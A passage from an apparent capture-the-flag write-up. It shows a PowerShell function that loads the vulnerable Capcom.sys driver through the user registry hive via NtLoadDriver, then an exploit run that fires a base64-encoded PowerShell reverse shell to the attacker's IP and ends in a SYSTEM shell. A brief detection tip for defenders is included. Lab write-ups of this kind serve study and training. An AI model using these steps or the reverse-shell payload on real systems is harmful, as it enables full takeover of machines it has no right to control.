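    if (-not $Unload -and -not (Test-Path -LiteralPath $DriverPath)) { throw "driver not found: $DriverPath" }

    # HKCU is \Registry\User\<SID> in NT path terms; that is the path NtLoadDriver receives
    $sid    = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
    $regKey = "HKCU:\System\CurrentControlSet\$ServiceName"
    $ntPath = "\Registry\User\$sid\System\CurrentControlSet\$ServiceName"

    if (-not $Unload) {
        # Mirror a normal HKLM\...\Services\<name> key: NT-style ImagePath and Type 1 (SERVICE_KERNEL_DRIVER)
        New-Item -Path $regKey -Force | Out-Null
        New-ItemProperty -Path $regKey -Name ImagePath -Value "\??\$DriverPath" -PropertyType String -Force | Out-Null
        New-ItemProperty -Path $regKey -Name Type -Value 1 -PropertyType DWord -Force | Out-Null
    }

    if (-not ('NtLoader' -as [type])) { Add-Type -TypeDefinition $ntLoaderSource }
    $status = [NtLoader]::Call($ntPath, [bool]$Unload)
    $op = if ($Unload) { 'NtUnloadDriver' } else { 'NtLoadDriver' }
    if ($Unload) { Remove-Item -Path $regKey -Recurse -Force -ErrorAction SilentlyContinue }

    # NTSTATUS 0 means the driver is loaded; 0xC0000022 (ACCESS_DENIED) means the privilege is
    # missing from the token; 0xC0000428 (INVALID_IMAGE_HASH) means signature enforcement rejected it
    '{0} {1} -> NTSTATUS 0x{2:X8}' -f $op, $ntPath, $status
}

Invoke-UserHiveDriverLoad -DriverPath 'C:\Windows\System32\spool\drivers\color\Capcom.sys'
# To clean up afterwards: Invoke-UserHiveDriverLoad -DriverPath 'C:\...\Capcom.sys' -Unload
```

The same mechanism is what defenders should look for: a driver load event whose service path starts with \Registry\User\ rather than \Registry\Machine\ is never normal, and SeLoadDriverPrivilege should only be assigned to accounts that are already administrators.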

Finally, we generate a PowerShell reverse shell: on the Reverse Shell Generator page (https://www.revshells.com/) pick the PowerShell #3 (Base64) payload with the attacker IP address and listening port (192.168.69.2 and 443 in my case). Before executing it, start a netcat listener on the attacker machine:

❯ nc -lvnp 443

listening on [any] 443 ...

Then run the payload through ExploitCapcom.exe EXPLOIT on the victim:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe EXPLOIT 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADYAOQAuADIAIgAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='

[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 0000026321830008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed

and we get a shell as nt authority/system in our listener:

❯ nc -lvnp 443

listening on [any] 443 ...
connect to [192.168.69.2] from (UNKNOWN) [192.168.69.69] 58090
whoami

nt authority\system

PS C:\Users\Chivas Regal\Documents>

We can finally read the root flag at Administrador desktop.


~Happy Hacking